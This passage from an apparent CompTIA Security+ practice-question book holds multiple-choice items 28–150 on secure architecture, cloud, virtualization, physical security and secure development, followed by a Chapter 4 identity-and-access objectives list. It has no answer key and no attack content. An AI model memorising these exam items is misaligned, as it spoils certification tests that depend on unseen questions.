- 28. Suzan is responsible for application development in her company. She wants to have all
- web applications tested prior to being deployed live. She wants to use a test system that is
- identical to the live server. What is this called?
- A. Production server
- B. Development server
- C. Test server
- D. Predeployment server
- 29. John is responsible for security in his company. He is implementing a kernel integrity sub-
- system for key servers. What is the primary benefit of this action?
- A. To detect malware
- B. To detect whether files have been altered
- C. To detect rogue programs being installed
- D. To detect changes to user accounts
- 30. You are responsible for BIOS security in your company. Which of the following is the
- most fundamental BIOS integrity technique?
- A. Verifying the BIOS version
- B. Using a TPM
- C. Managing BIOS passwords
- D. Backing up the BIOS
- 31. You have been asked to implement security for SCADA systems in your company. Which
- of the following standards will be most helpful to you?
- A. NIST 800-82
- B. PCI-DSS
- C. NIST 800-30
- D. ISO 27002
- 32. Joanne works for a large insurance company. Some employees have wearable technology,
- such as smart watches. What is the most significant security concern from such devices?
- A. These devices can distract employees.
- B. These devices can be used to carry data in and out of the company.
- C. These devices may not have encrypted drives.
- D. These devices may not have strong passwords.
- 33. John is installing an HVAC system in his datacenter. What will this HVAC have the most
- impact on?
- A. Confidentiality
- B. Availability
- C. Fire suppression
- D. Monitoring access to the datacenter
- 34. Maria is a security engineer with a manufacturing company. During a recent investiga-
- tion, she discovered that an engineer’s compromised workstation was being used to con-
- nect to SCADA systems while the engineer was not logged in. The engineer is responsible
- for administering the SCADA systems and cannot be blocked from connecting to them.
- What should Maria do to mitigate this threat?
- A. Install host-based antivirus software on the engineer’s system.
- B. Implement account usage auditing on the SCADA system.
- C. Implement an NIPS on the SCADA system.
- D. Use FDE on the engineer’s system.
- 35. Lucy works as a network administrator for a large company. She needs to administer sev-
- eral servers. Her objective is to make it easy to administer and secure these servers, as well
- as making the installation of new servers more streamlined. Which of the following best
- addresses these issues?
- A. Setting up a cluster
- B. Virtualizing the servers
- C. Putting the servers on a VLAN
- D. Putting the servers on a separate subnet
- 36. Gerard is responsible for secure communications with his company’s e-commerce server.
- All communications with the server use TLS. What is the most secure option for Gerard
- to store the private key on the e-commerce server?
- A. HSM
- B. FDE
- C. SED
- D. SDN
- 37. You are the security officer for a large company. You have discovered malware on one of
- the workstations. You are concerned that the malware might have multiple functions and
- might have caused more security issues with the computer than you can currently detect.
- What is the best way to test this malware?
- A. Leave the malware on that workstation until it is tested.
- B. Place the malware in a sandbox environment for testing.
- C. It is not important to test it; just remove it from the machine.
- D. Place the malware on a honeypot for testing.
- 38. Web developers in your company currently have direct access to the production server and
- can deploy code directly to it. This can lead to unsecure code, or simply code flaws being
- deployed to the live system. What would be the best change you could make to mitigate
- this risk?
- A. Implement sandboxing.
- B. Implement virtualized servers.
- C. Implement a staging server.
- D. Implement deployment policies.
- 39. Denish is concerned about the security of embedded devices in his company. He is most
- concerned about the operating system security for such devices. Which of the following
- would be the best option for mitigating this threat?
- A. RTOS
- B. SCADA
- C. FDE
- D. TPM
- 40. Which of the following 802.11 standards is supported in WPA2, but not in WEP or WPA?
- A. 802.11a
- B. 802.11b
- C. 802.11i
- D. 802.11n
- 41. Teresa is responsible for WiFi security in her company. Which wireless security protocol
- uses TKIP?
- A. WPA
- B. CCMP
- C. WEP
- D. WPA2
- 42. Juan is responsible for wireless security in his company. He has decided to disable the SSID
- broadcast on the single AP the company uses. What will the effect be on client machines?
- A. They will no longer be able to use wireless networking.
- B. They will no longer see the SSID as a preferred network when they are connected.
- C. They will no longer see the SSID as an available network.
- D. They will be required to make the SSID part of their HomeGroup.
- 43. Which cloud service model provides the consumer with the infrastructure to create appli-
- cations and host them?
- A. SaaS
- B. PaaS
- C. IaaS
- D. CaaS
- 44. Which cloud service model gives the consumer the ability to use applications provided by
- the cloud provider over the Internet?
- A. SaaS
- B. PaaS
- C. IaaS
- D. CaaS
- 45. Which feature of cloud computing involves dynamically provisioning (or deprovisioning)
- resources as needed?
- A. Multitenancy
- B. Elasticity
- C. CMDB
- D. Sandboxing
- 46. Which type of hypervisor implementation is known as “bare metal”?
- A. Type I
- B. Type II
- C. Type III
- D. Type IV
- 47. Mohaned is a security analyst and has just removed malware from a virtual server. What
- feature of virtualization would he use to return the virtual server to a last known good
- state?
- A. Sandboxing
- B. Hypervisor
- C. Snapshot
- D. Elasticity
- 48. Lisa is concerned about fault tolerance for her database server. She wants to ensure that if
- any single drive fails, it can be recovered. What RAID level would support this goal while
- using distributed parity bits?
- A. RAID 0
- B. RAID 1
- C. RAID 3
- D. RAID 5
- 49. Jarod is concerned about EMI affecting a key escrow server. Which method would be
- most effective in mitigating this risk?
- A. VLAN
- B. SDN
- C. Trusted platform module
- D. Faraday cage
- 50. John is responsible for physical security at his company. He is particularly concerned
- about an attacker driving a vehicle into the building. Which of the following would
- provide the best protection against this threat?
- A. A gate
- B. Bollards
- C. A security guard on duty
- D. Security cameras
- 51. Mark is responsible for cybersecurity at a small college. There are many computer labs
- that are open for students to use. These labs are monitored only by a student worker, who
- may or may not be very attentive. Mark is concerned about the theft of computers. Which
- of the following would be the best way for him to mitigate this threat?
- A. Cable locks
- B. FDE on the lab computers
- C. Strong passwords on the lab computers
- D. Having a lab sign-in sheet
- 52. Joanne is responsible for security at a power plant. The facility is very sensitive and secu-
- rity is extremely important. She wants to incorporate two-factor authentication with
- physical security. What would be the best way to accomplish this?
- A. Smart cards
- B. A mantrap with a smart card at one door and a pin keypad at the other door
- C. A mantrap with video surveillance
- D. A fence with a smart card gate access
- 53. Which of the following terms refers to the process of establishing a standard for security?
- A. Baselining
- B. Security evaluation
- C. Hardening
- D. Normalization
- 54. You are trying to increase security at your company. You’re currently creating an outline
- of all the aspects of security that will need to be examined and acted on. Which of the fol-
- lowing terms describes the process of improving security in a trusted OS?
- A. FDE
- B. Hardening
- C. SED
- D. Baselining
- 55. Which level of RAID is a “stripe of mirrors”?
- A. RAID 1+0
- B. RAID 6
- C. RAID 0
- D. RAID 1
- 56. Isabella is responsible for database management and security. She is attempting to remove
- redundancy in the database. What is this process called?
- A. Integrity checking
- B. Deprovisioning
- C. Baselining
- D. Normalization
- 57. A list of applications approved for use on your network would be known as which of the
- following?
- A. Blacklist
- B. Red list
- C. Whitelist
- D. Orange list
- 58. Hans is a security administrator for a large company. Users on his network visit a wide
- range of websites. He is concerned they might get malware from one of these many web-
- sites. Which of the following would be his best approach to mitigate this threat?
- A. Implement host-based antivirus.
- B. Blacklist known infected sites.
- C. Set browsers to allow only signed components.
- D. Set browsers to block all active content (ActiveX, JavaScript, etc.).
- 59. Elizabeth has implemented agile development for her company. What is the primary dif-
- ference between agile development and the waterfall method?
- A. Agile has fewer phases.
- B. Waterfall has fewer phases.
- C. Agile is more secure.
- D. Agile repeats phases.
- 60. John is using the waterfall method for application development. At which phase should he
- implement security measures?
- A. Requirements
- B. Design
- C. Implementation
- D. All
- 61. You are responsible for database security at your company. You are concerned that pro-
- grammers might pass badly written SQL commands to the database, or that an attacker
- might exploit badly written SQL in applications. What is the best way to mitigate this
- threat?
- A. Programmer training
- B. Programming policies
- C. Agile programming
- D. Stored procedures
- 62. Mary is concerned about application security for her company’s application development.
- Which of the following is the most important step for addressing application security?
- A. Proper error handling
- B. Regular data backups
- C. Encrypted data transmission
- D. Strong authentication
- 63. Farès is responsible for managing the many virtual machines on his company’s networks.
- Over the past two years, the company has increased the number of virtual machines sig-
- nificantly. Farès is no longer able to effectively manage the large number of machines.
- What is the term for this situation?
- A. VM overload
- B. VM sprawl
- C. VM spread
- D. VM zombies
- 64. Mary is responsible for virtualization management in her company. She is concerned
- about VM escape. Which of the following methods would be the most effective in mitigat-
- ing this risk?
- A. Only share resources between the VM and host if absolutely necessary.
- B. Keep the VM patched.
- C. Use a firewall on the VM.
- D. Use host-based antimalware on the VM.
- 65. You work at a large company. You are concerned about ensuring that all workstations
- have a common configuration, no rogue software is installed, and all patches are kept up
- to date. Which of the following would be the most effective for accomplishing this?
- A. Use VDE.
- B. Implement strong policies.
- C. Use an image for all workstations.
- D. Implement strong patch management.
- 66. Juan is responsible for the physical security of the company server room. He has been
- asked to recommend a type of fire suppression system for the server room. Which of the
- following would be the best choice?
- A. Wet pipe
- B. Deluge
- C. Pre-action
- D. Halon
- 67. You are responsible for server room security for your company. You are concerned about
- physical theft of the computers. Which of the following would be best able to detect theft
- or attempted theft?
- A. Motion sensor–activated cameras
- B. Smart card access to the server rooms
- C. Strong deadbolt locks for the server rooms
- D. Logging everyone who enters the server room
- 68. Teresa has deployed session tokens on her network. These would be most effective against
- which of the following attacks?
- A. DDoS
- B. Replay
- C. SYN flood
- D. Malware
- 69. Hector is using infrared cameras to verify that servers in his datacenter are being properly
- racked. Which of the following datacenter elements is he concerned about?
- A. EMI blocking
- B. Humidity control
- C. Hot and cold aisles
- D. HVAC
- 70. Gerald is concerned about unauthorized people entering the company’s building. Which
- of the following would be most effective in preventing this?
- A. Alarm systems
- B. Fencing
- C. Cameras
- D. Security guards
- 71. Which of the following is the most important benefit from implementing SDN?
- A. It will stop malware.
- B. It provides scalability.
- C. It will detect intrusions.
- D. It will prevent session hijacking.
- 72. Mark is an administrator for a health care company. He has to support an older, legacy
- application. He is concerned that this legacy application might have vulnerabilities that
- would affect the rest of the network. What is the most efficient way to mitigate this?
- A. Use an application container.
- B. Implement SDN.
- C. Run the application on a separate VLAN.
- D. Insist on an updated version of the application.
- 73. Lars is auditing the physical security of a company. The company uses chain-link fences
- on its perimeter. The fence is over pavement, not soft ground. How close to the ground
- should the bottom of the fence be?
- A. Touching the ground
- B. Within 4 inches
- C. There is no standard for this.
- D. Within 2 inches
- 74. Mia has to deploy and support a legacy application. The configuration for this application
- and the OS it runs on are very specific and cannot be changed. What is the best approach
- for her to deploy this?
- A. Use an immutable server.
- B. Use a VM.
- C. Set permissions on the application so it cannot be changed.
- D. Place the application on a separate VLAN.
- 75. To mitigate the impact of a software vendor going out of business, a company that uses
- vendor software should require which one of the following?
- A. A detailed credit investigation prior to acquisition
- B. A third-party source-code escrow
- C. Substantial penalties for breach of contract
- D. Standby contracts with other vendors
- 76. Abigail is responsible for datacenters in a large, multinational company. She has to sup-
- port multiple datacenters in diverse geographic regions. What would be the most effective
- way for her to manage these centers consistently across the enterprise?
- A. Hire datacenter managers for each center.
- B. Implement enterprise-wide SDN.
- C. Implement Infrastructure as Code (IaC).
- D. Automate provisioning and deprovisioning.
- 77. Olivia is responsible for web application security for her company’s e-commerce server.
- She is particularly concerned about XSS and SQL injection. Which technique would be
- most effective in mitigating these attacks?
- A. Proper error handling
- B. The use of stored procedures
- C. Proper input validation
- D. Code signing
- 78. Sophia wants to test her company’s web application to see if it is handling input validation
- and data validation properly. Which testing method would be most effective for this?
- A. Static code analysis
- B. Fuzzing
- C. Baselining
- D. Version control
- 79. Omar is using the waterfall method for software development in his company. Which of
- the following is the proper sequence for the waterfall method?
- A. Requirements, design, implementation, testing, deployment, maintenance
- B. Planning, designing, coding, testing, deployment
- C. Requirements, planning, designing, coding, testing, deployment
- D. Design, coding, testing, deployment, maintenance
- 80. Lilly is responsible for security on web applications for her company. She is checking to
- see that all applications have robust input validation. What is the best way to implement
- validation?
- A. Server-side validation
- B. Client-side validation
- C. Validate in transit
- D. Client-side and server-side validation
- 81. Edward is responsible for web application security at a large insurance company. One
- of the applications that he is particularly concerned about is used by insurance adjusters
- in the field. He wants to have strong authentication methods to mitigate misuse of the
- application. What would be his best choice?
- A. Authenticate the client with a digital certificate.
- B. Implement a very strong password policy.
- C. Secure application communication with TLS.
- D. Implement a web application firewall (WAF).
- 82. Sarah is the CIO for a small company. The company uses several custom applications
- that have complicated interactions with the host operating system. She is concerned about
- ensuring that systems on her network are all properly patched. What is the best approach
- in her environment?
- A. Implement automatic patching.
- B. Implement a policy that has individual users patch their systems.
- C. Delegate patch management to managers of departments so they can find the best
- patch management for their departments.
- D. Immediately deploy patches to a test environment, then as soon as testing is complete
- have a staged rollout to the network.
- 83. John is examining the logs for his company’s web applications. He discovers what he
- believes is a breach. After further investigation, it appears as if the attacker executed code
- from one of the libraries the application uses, code that is no longer even used by the
- application. What best describes this attack?
- A. Buffer overflow
- B. Code reuse attack
- C. DoS attack
- D. Session hijacking
- 84. Emiliano is a network administrator and is concerned about the security of peripheral
- devices. Which of the following would be a basic step he could take to improve security
- for those devices?
- A. Implement FDE.
- B. Turn off remote access (SSH, telnet, etc.) if not needed.
- C. Utilize fuzzy testing for all peripherals.
- D. Implement digital certificates for all peripherals.
- 85. Ixxia is a software development team manager. She is concerned about memory leaks in
- code. What type of testing is most likely to find memory leaks?
- A. Fuzzing
- B. Stress testing
- C. Static code analysis
- D. Normalization
- 86. Victor is a network administrator for a medium-sized company. He wants to be able to
- access servers remotely so that he can perform small administrative tasks from remote
- locations. Which of the following would be the best protocol for him to use?
- A. SSH
- B. Telnet
- C. RSH
- D. SNMP
- 87. Mark is responsible for a server that runs sensitive software for a major research facility.
- He is very concerned that only authorized software execute on this server. He is also
- concerned about malware masquerading as legitimate, authorized software. What
- technique would best address this concern?
- A. Secure boot
- B. Software attestation
- C. Sandboxing
- D. TPM
- 88. Hannah is a programmer with a large software company. She is interested in ensuring that
- the module she just created will work well with a module created by another program.
- What type of testing is this?
- A. Unit testing
- B. Regression testing
- C. Stress testing
- D. Integration testing
- 89. Erik is responsible for the security of a SCADA system. Availability is a critical issue.
- Which of the following is most important to implement?
- A. SIEM
- B. IPS
- C. Automated patch control
- D. Honeypot
- 90. You are concerned about the security of new devices your company has implemented.
- Some of these devices use SoC technology. What would be the best security measure you
- could take for these?
- A. Using a TPM
- B. Ensuring each has its own cryptographic key
- C. Using SED
- D. Using BIOS protection
- 91. Vincent works for a company that manufactures portable medical devices, such as insulin
- pumps. He is concerned about ensuring these devices are secure. Which of the following is
- the most important step for him to take?
- A. Ensure all communications with the device are encrypted.
- B. Ensure the devices have FDE.
- C. Ensure the devices have individual antimalware.
- D. Ensure the devices have been fuzz tested.
- 92. Emile is concerned about securing the computer systems in vehicles. Which of the follow-
- ing vehicle types has significant cybersecurity vulnerabilities?
- A. UAV
- B. Automobiles
- C. Airplanes
- D. All of the above
- 93. Ariel is responsible for software development in her company. She is concerned that the
- software development team integrate well with the network system. She wants to ensure
- that software development processes are aligned with the security needs of the entire
- network. Which of the following would be most important for her to implement?
- A. Integration testing
- B. Secure DevOps
- C. Clear policies
- D. Employee training
- 94. Greg is a programmer with a small company. He is responsible for the web application.
- He has become aware that one of the modules his web application uses may have a secu-
- rity flaw allowing an attacker to circumvent authentication. There is an update available
- for this module that fixes the flaw. What is the best approach for him to take to mitigate
- this threat?
- A. Submit an RFC.
- B. Immediately apply the update.
- C. Place the update on a test server, then if it works apply it to the production server.
- D. Document the issue.
- 95. You are using a sophisticated system that models various attacks on your networks. You
- intend for this system to help your team realize weak areas and improve response to
- incidents. What is the most important step to take before relying on data from this system?
- A. Get approval from a CAB.
- B. Thoroughly review the systems documentation.
- C. Verify the models being used.
- D. Perform integration testing on the system.
- 96. Your company has an accounting application that was developed in-house. It has been in
- place for 36 months, and functioning very well, with very few issues. You have just made
- a minor change to the tax calculation based on a change in tax law. What should be your
- next step?
- A. Deploy the change.
- B. Get CAB approval for the change.
- C. Perform stress testing.
- D. Perform regression testing.
- 97. Tom works as a software development manager for a large company. He is trying to
- explain to management the difference between compiled code and runtime code. What is
- the biggest advantage of compiled code?
- A. Better performance
- B. Platform independence
- C. More secure
- D. Faster development time
- 98. Your company is interested in keeping data in the cloud. Management feels that public
- clouds are not secure but is concerned about the cost of a private cloud. What is the
- solution you would recommend?
- A. Tell them there are no risks with public clouds.
- B. Tell them they will have to find a way to budget for a private cloud.
- C. Suggest that they consider a community cloud.
- D. Recommend against a cloud solution at this time.
- 99. Your development team primarily uses Windows, but they need to develop a specific solu-
- tion that will run on Linux. What is the best solution to getting your programmers access
- to Linux systems for development and testing?
- A. Set their machines to dual-boot Windows and Linux.
- B. PaaS
- C. Set up a few Linux machines for them to work with as needed.
- D. IaaS
- 100. Daniel works for a mid-sized financial institution. The company has recently moved some
- of its data to a cloud solution. Daniel is concerned that the cloud provider may not sup-
- port the same security policies as the company’s internal network. What is the best way to
- mitigate this concern?
- A. Implement a cloud access security broker.
- B. Perform integration testing.
- C. Establish cloud security policies.
- D. Implement Security as a Service.
- 101. Hanz is responsible for the e-commerce servers at his company. He is concerned about
- how they will respond to a DoS attack. Which software testing methodology would be
- most helpful in determining this?
- A. Regression testing
- B. Stress testing
- C. Integration testing
- D. Fuzz testing
- 102. You are the CIO for a small company. The company wants to use cloud storage for some
- of its data, but cost is a major concern. Which of the following cloud deployment models
- would be best?
- A. Community cloud
- B. Private cloud
- C. Public cloud
- D. Hybrid cloud
- 103. Alisha is monitoring security for a mid-sized financial institution. Under her predecessor
- there were multiple high-profile breaches. Management is very concerned about detecting
- any security issues or breach of policy as soon as possible. Which of the following would
- be the best solution for this?
- A. Monthly audits
- B. NIPS
- C. NIDS
- D. Continuous monitoring
- 104. Helga works for a bank and is responsible for secure communications with the online
- banking application. The application uses TLS to secure all customer communications.
- She has noticed that since migrating to larger encryption keys, the server’s performance
- has declined. What would be the best way to address this issue?
- A. Implement a VPN concentrator.
- B. Implement an SSL accelerator.
- C. Return to smaller encryption keys.
- D. Upgrade all servers.
- 105. What is the primary advantage of allowing only signed code to be installed on computers?
- A. It guarantees that malware will not be installed.
- B. It improves patch management.
- C. It verifies who created the software.
- D. It executes faster on computers with a TPM.
- 106. Which of the following is the best description for VM sprawl?
- A. When VMs on your network outnumber physical machines
- B. When there are more VMs than IT can effectively manage
- C. When a VM on a computer begins to consume too many resources
- D. When VMs are spread across a wide area network
- 107. Which of the following is the best description of a stored procedure?
- A. Code that is in a DLL, rather than the executable
- B. Server-side code that is called from a client
- C. SQL statements compiled on the database server as a single procedure that can be
- called
- D. Procedures that are kept on a separate server from the calling application, such as in
- middleware
- 108. Farès is responsible for security at his company. He has had bollards installed around the
- front of the building. What is Farès trying to accomplish?
- A. Gated access for people entering the building
- B. Video monitoring around the building
- C. Protecting against EMI
- D. Preventing a vehicle from being driven into the building
- 109. Jane is concerned about servers in her datacenter. She is particularly worried about EMI.
- What damage might EMI most likely cause to servers?
- A. Damage to chips (CPU or RAM)
- B. Temperature control issues
- C. Malware infections
- D. The staff could be locked out of the servers.
- 110. You are concerned about VM escape attacks. Which of the following would provide the
- most protection against this?
- A. Completely isolate the VM from the host.
- B. Install a host-based antivirus on both the VM and the host.
- C. Implement FDE on both the VM and the host.
- D. Use a TPM on the host.
- 111. Teresa is the network administrator for a small company. The company is interested in a
- robust and modern network defense strategy but lacks the staff to support it. What would
- be the best solution for Teresa to use?
- A. Implement SDN.
- B. Use automated security.
- C. Use Security as a Service.
- D. Implement only as much security controls as they can support.
- 112. Dennis is trying to set up a system to analyze the integrity of applications on his network.
- He wants to make sure that the applications have not been tampered with or Trojaned.
- What would be most useful in accomplishing this goal?
- A. Implement NIPS.
- B. Use cryptographic hashes.
- C. Sandbox the applications in question.
- D. Implement NIDS.
- 113. George is a network administrator at a power plant. He notices that several turbines had
- unusual ramp-ups in cycles last week. After investigating, he finds that an executable was
- uploaded to the system control console and caused this. Which of the following would be
- most effective in preventing this from affecting the SCADA system in the future?
- A. Implement SDN.
- B. Improve patch management.
- C. Place the SCADA system on a separate VLAN.
- D. Implement encrypted data transmissions.
- 114. Tom is responsible for VPN connections in his company. His company uses IPSec for
- VPNs. What is the primary purpose of AH in IPSec?
- A. Encrypt the entire packet.
- B. Encrypt just the header.
- C. Authenticate the entire packet.
- D. Authenticate just the header.
- 115. Mia is a network administrator for a bank. She is responsible for secure communications
- with her company’s customer website. Which of the following would be the best for her to
- implement?
- A. SSL
- B. PPTP
- C. IPSec
- D. TLS
- 116. Abigail is responsible for setting up an NIPS on her network. The NIPS is located in one
- particular network segment. She is looking for a passive method to get a copy of all traf-
- fic to the NIPS network segment so that it can analyze the traffic. Which of the following
- would be her best choice?
- A. Using a network tap
- B. Using port mirroring
- C. Setting the NIPS on a VLAN that is connected to all other segments
- D. Setting up an NIPS on each segment
- 117. Janice is explaining how IPSec works to a new network administrator. She is trying to
- explain the role of IKE. Which of the following most closely matches the role of IKE in
- IPSec?
- A. It encrypts the packet.
- B. It establishes the SAs.
- C. It authenticates the packet.
- D. It establishes the tunnel.
- 118. Jeff is the security administrator for an e-commerce site. He is concerned about DoS
- attacks. Which of the following would be the most effective in addressing this?
- A. DDoS mitigator
- B. WAF with SPI
- C. NIPS
- D. Increased available bandwidth
- 119. Doug is a network administrator for a small company. The company has recently imple-
- mented an e-commerce server. This has placed a strain on network bandwidth. What
- would be the most cost-effective means for him to address this issue?
- A. Isolate the new server on a separate network segment.
- B. Upgrade the network to CAT 7.
- C. Move to fiber optic.
- D. Implement aggregation switches.
- 120. Liam is responsible for monitoring security events in his company. He wants to see how
- diverse events may connect. He is interested in identifying different indicators of compro-
- mise that may point to the same breach. Which of the following would be most helpful for
- him to implement?
- A. NIDS
- B. SIEM
- C. Correlation engine
- D. Aggregation switch
- 121. Emily manages the IDS/IPS for her network. She has an NIPS installed and properly
- configured. It is not detecting obvious attacks on one specific network segment. She has
- verified that the NIPS is properly configured and working properly. What would be the
- most efficient way for her to address this?
- A. Implement port mirroring for that segment.
- B. Install an NIPS on that segment.
- C. Upgrade to a more effective NIPS.
- D. Isolate that segment on its own VLAN.
- 122. You have been instructed to find a VPN solution for your company. Your company uses
- TACACS+ for remote access. Which of the following would be the best VPN solution for
- your company?
- A. PPTP
- B. RADIUS
- C. L2TP
- D. CHAP
- 123. Jacob is the CIO for a mid-sized company. His company has very good security policies
- and procedures. The company has outsourced its web application development to a well-
- known web programming company. Which of the following should be the most important
- security issue for Jacob to address?
- A. The web application vendor’s hiring practices
- B. The financial stability of the web application vendor
- C. Security practices of the web application vendor
- D. Having an escrow for the source code
- 124. Gerard is responsible for physical security at his company. He is considering using cam-
- eras that would detect a burglar entering the building at night. Which of the following
- would be most useful in accomplishing this goal?
- A. Motion-sensing camera
- B. Infrared-sensing camera
- C. Sound-activated camera
- D. HD camera
- 125. Tim is implementing a Faraday cage around his server room. What is the primary purpose
- of a Faraday cage?
- A. Regulate temperature
- B. Regulate current
- C. Block intrusions
- D. Block EMI
- 126. You are working for a large company. You are trying to find a solution that will provide
- controlled physical access to the building and record every employee who enters the
- building. Which of the following would be the best for you to implement?
- A. A security guard with a sign-in sheet
- B. Smart card access
- C. A camera by the entrance
- D. A sign-in sheet by the front door
- 127. David is responsible for cryptographic keys in his company. What is the best way to
- deauthorize a public key?
- A. Send out a network alert.
- B. Delete the digital certificate.
- C. Publish that certificate in the CRL.
- D. Notify the RA.
- 128. Thomas is trying to select the right fire extinguisher for his company’s server room.
- Which of the following would be his best choice?
- A. Type A
- B. Type B
- C. Type C
- D. Type D
- 129. Carole is concerned about security for her server room. She wants the most secure lock
- she can find for the server room door. Which of the following would be the best choice for
- her?
- A. Combination lock
- B. Key-in-knob
- C. Deadbolt
- D. Padlock
- 130. What is the ideal humidity range for a server room?
- A. 70% to 80%
- B. 40% to 60%
- C. Below 30%
- D. Above 70%
- 131. Molly is implementing biometrics in her company. Which of the following should be her
- biggest concern?
- A. FAR
- B. FRR
- C. CER
- D. EER
- 132. Daniel is responsible for physical security in his company. All external doors have
- electronic smart card access. In an emergency such as a power failure, how should the
- doors fail?
- A. Fail secure
- B. Fail closed
- C. Fail open
- D. Fail locked
- 133. Donald is responsible for networking for a defense contractor. He is concerned that
- emanations from UTP cable could reveal classified information. Which of the following
- would be his most effective way to address this?
- A. Migrate to CAT 7 cable.
- B. Implement protected cabling.
- C. Place all cable in a Faraday cage.
- D. Don’t send any classified information over the cable.
- 134. Fred is responsible for physical security in his company. He wants to find a good way
- to protect the USB thumb drives that have BitLocker keys stored on them. Which of the
- following would be the best solution for this situation?
- A. Store the drives in a secure cabinet.
- B. Encrypt the thumb drives.
- C. Don’t store BitLocker keys on these drives.
- D. Lock the thumb drives in desk drawers.
- 135. Juanita is responsible for servers in her company. She is looking for a fault-tolerant
- solution that can handle two drives failing. Which of the following should she select?
- A. RAID 1+0
- B. RAID 3
- C. RAID 5
- D. RAID 6
- 136. You are a network administrator for a mid-sized company. You need all workstations to
- have the same configuration. What would be the best way for you to accomplish this?
- A. Push out a configuration file.
- B. Implement a policy requiring all workstations to be configured the same way.
- C. Ensure all computers have the same version of the operating system and the same
- applications installed.
- D. Use a master image that is properly configured and image all workstations from that.
- 137. Mike is a network administrator for an e-commerce company. There have been several
- updates to the operating system, the web server software, and the web application, all
- within the last 24 hours. It appears that one of these updates has caused a significant
- security problem. What would be the best approach for Mike to take to correct this
- problem?
- A. Remove the updates one at a time to see which corrects the problem.
- B. Roll the server back to the last known good state.
- C. Investigate and find out which update caused the problem, and remove only that
- update.
- D. Investigate and find out which update caused the problem, and find a patch for that
- issue.
- 138. Which device would most likely process the following rules?
- PERMIT IP ANY EQ 443
- DENY IP ANY ANY
- A. NIPS
- B. HIPS
- C. Content filter
- D. Firewall
- 139. Ixxia is responsible for security at a mid-sized company. She wants to prevent users on her
- network from visiting job-hunting sites while at work. Which of the following would be
- the best device to accomplish this goal?
- A. Proxy server
- B. NAT
- C. Firewall
- D. NIPS
- 140. You are responsible for an e-commerce site. The site is hosted in a cluster. Which of the
- following techniques would be best in assuring availability?
- A. A VPN concentrator
- B. Aggregate switching
- C. An SSL accelerator
- D. Load balancing
- 141. When you are concerned about application security, what is the most important issue in
- memory management?
- A. Never allocate a variable any larger than is needed.
- B. Always check bounds on arrays.
- C. Always declare a variable where you need it (i.e., at function or file level if possible).
- D. Make sure you release any memory you allocate.
- 142. Darrel is looking for a cloud solution for his company. One of the requirements is that
- the IT staff can make the transition with as little change to the existing infrastructure as
- possible. Which of the following would be his best choice?
- A. Off-premises cloud
- B. On-premises cloud
- C. Hybrid solution
- D. Use only a community cloud
- 143. Ryan is concerned about the security of his company’s web application. Since the
- application processes confidential data, he is most concerned about data exposure. Which
- of the following would be the most important for him to implement?
- A. WAF
- B. TLS
- C. NIPS
- D. NIDS
- 144. Arjun has just taken over web application security for a small company. He notices that
- some values are temporarily stored in hidden fields on one of the web pages. What is this
- called and how would it be best characterized?
- A. This is obfuscation, a weak security measure.
- B. This is data hiding, a weak security measure.
- C. This is obfuscation, a possible security flaw.
- D. This is data hiding, a possible security flaw.
- 145. What is the primary reason a company would consider implementing Agile programming?
- A. To speed up development time
- B. To improve development documentation
- C. To focus more on design
- D. To focus more on testing
- 146. When you’re implementing security cameras in your company, which of the following is
- the most important concern?
- A. High-definition video
- B. Large storage capacity
- C. How large an area the camera can cover
- D. Security of the camera and video storage
- 147. What is the primary security issue presented by monitors?
- A. Unauthorized users may see confidential data.
- B. Data can be detected from electromagnetic emanations.
- C. Poor authentication
- D. Screen burn
- 148. Clark is responsible for mobile device security in his company. Which of the following is
- the most important security measure for him to implement?
- A. Encrypted drives
- B. Patch management
- C. Remote wiping
- D. Geotagging
- 149. Which of the following security measures is most effective against phishing attacks?
- A. User training
- B. NIPS
- C. Spam filters
- D. Content filter
- 150. You are the CISO for a mid-sized health care company. Which of the following is the most
- important for you to implement?
- A. Industry best practices
- B. Contractual requirements
- C. Strong security policies
- D. Regulatory requirements
- +++++
- ++++
- 4
- Identity and Access
- Management
- The CompTIA Security+ Exam
- SY0-501 topics covered in this
- chapter include the following:
- ✓ ✓ 4.1 Compare and contrast identity and access
- management concepts.
- ■ ■
- Identification, authentication, authorization and accounting
- (AAA)
- ■ ■
- Multifactor authentication
- ■ ■ Something you are
- ■ ■ Something you have
- ■ ■ Something you know
- ■ ■ Somewhere you are
- ■ ■ Something you do
- ■ ■ Federation
- ■ ■ Single sign-on
- ■ ■ Transitive trust
- ✓ ✓ 4.2 Given a scenario, install and configure identity and
- access services.
- ■ ■ LDAP
- ■ ■ Kerberos
- ■ ■ TACACS+
- ■ ■ CHAP
- ■ ■ PAP
- ■ ■ MSCHAP
- ■ ■ RADIUS
- ■ ■ SAML
- ■ ■ OpenID Connect■ ■ OAUTH
- ■ ■ Shibboleth
- ■ ■ Secure token
- ■ ■ NTLM
- ✓ ✓ 4.3 Given a scenario,implement identity and access
- management controls.
- ■ ■
- ■ ■
- ■ ■
- ■ ■
- ■ ■
- Access control models
- ■ ■ MAC
- ■ ■ DAC
- ■ ■ ABAC
- ■ ■ Role-based access control
- ■ ■ Rule-based access control
- Physical access control
- ■ ■ Proximity cards
- ■ ■ Smart cards
- Biometric factors
- ■ ■ Fingerprint scanner
- ■ ■ Retinal scanner
- ■ ■ Iris scanner
- ■ ■ Voice recognition
- ■ ■ Facial recognition
- ■ ■ False acceptance rate
- ■ ■ False rejection rate
- ■ ■ Crossover error rate
- Tokens
- ■ ■ Hardware
- ■ ■ Software
- ■ ■ HOTP/TOTP
- Certificate-based authentication
- ■ ■ PIV/CAC/smart card
- ■ ■ IEEE 802.1x■ ■ File system security
- ■ ■ Database security
- ✓ ✓ 4.4 Given a scenario, differentiate common account
- management practices.
- ■ ■
- ■ ■
- ■ ■
- Account types
- ■ ■ User account
- ■ ■ Shared and generic accounts/credentials
- ■ ■ Guest accounts
- ■ ■ Service accounts
- ■ ■ Privileged accounts
- General Concepts
- ■ ■ Least privilege
- ■ ■ Onboarding/offboarding
- ■ ■ Permission auditing and review
- ■ ■ Usage auditing and review
- ■ ■ Time-of-day restrictions
- ■ ■ Recertification
- ■ ■ Standard naming convention
- ■ ■ Account maintenance
- ■ ■ Group-based access control
- ■ ■ Location-based policies
- Account policy enforcement
- ■ ■ Credential management
- ■ ■ Group policy
- ■ ■ Password complexity
- ■ ■ Expiration
- ■ ■ Recovery
- ■ ■ Disablement
- ■ ■ Lockout
- ■ ■ Password history
- ■ ■ Password reuse
- ■ ■ Password lengthChapter 4
- 114
- ■
- Identity and Access Management
- 1. Jack is using smart cards for authentication. He is trying to classify the type of authentica-
- tion for a report to his CIO. What type of authentication is Jack using?
